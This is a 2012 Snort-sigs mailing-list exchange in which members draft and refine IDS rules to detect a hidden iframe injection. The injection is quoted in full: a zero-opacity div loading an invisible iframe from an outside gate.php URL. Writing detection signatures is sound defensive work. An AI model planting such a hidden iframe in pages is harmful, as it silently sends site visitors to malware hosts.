[Snort-sigs] Rule thought

James Lay jlay at ...3266...
Mon Aug 6 15:29:25 EDT 2012


On 2012-08-06 12:27, lists at ...3397... wrote:
> On 08/06/12 13:13, James Lay wrote:
>> All,
>>
>> Recently (today) I ran into the below:
>>
>> 
>> <!--qpi--><style>div.pofasdfhg{z-index:-1;position:absolute;left:0;top:0;opacity:0.0;filter:alpha(opacity=0);-moz-opacity:0;}</style><div
>> class=pofasdfhg><iframe src=http://analitics3.in/gate.php?f=1003673
>> frameborder=0 marginheight=0 marginwidth=0 scrolling=0 width=5 
>> height=5
>> border=0></iframe></div><!--/qpi-->
>>
>> I've not seen an iframe injection that included a specified class
>> before.  My original draft rule looked like:
>>
>> alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any
>> (msg:"INDICATOR-COMPROMISE div class iframe in page"; file_data;
>> pcre:"/<\/style><div class=[a-z]{9}><iframe src/i";
>> classtype:web-application-attack; sid:10000017; rev:1;)
>>
>> But this looks pretty expensive.  I'm sure there's a better way to
>> match this...would it be something like:
>>
>> content:"</style><div"; pcre:"/class=[a-z]{9}>/"; content:"<iframe
>> src";
>>
>> My question is how do I tell Snort to match all three consecutively? 
>> I
>> get that I could use within, but would that apply to the pcre?  
>> Thanks
>> for any advice.
>
> I think there's more of an abnormality around the unquoted URL in the
> iframe and
> I'm not certain the class will always be 9 characters, but assuming
> it is how about:
>
> alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any
> (msg:"INDICATOR-COMPROMISE
> div tag with class preceding iframe to specific URL"; 
> flow:from_server,
> established; file_data; content:"<div class="; content:"<iframe 
> src=http:";
> fast_pattern; within:30; pcre:"/<div class=[a-z]{9}><iframe
> src=http[^\x3e]+\.php\?[a-z]=\d+\x20/"; classtype:bad-unknown; sid:x; 
> rev:1;)
>
> Just a thought...  Joel will probably want to add /smi ;)


Ah...I totally missed that...go me!  Thank you...this does help.

James




More information about the Snort-sigs mailing list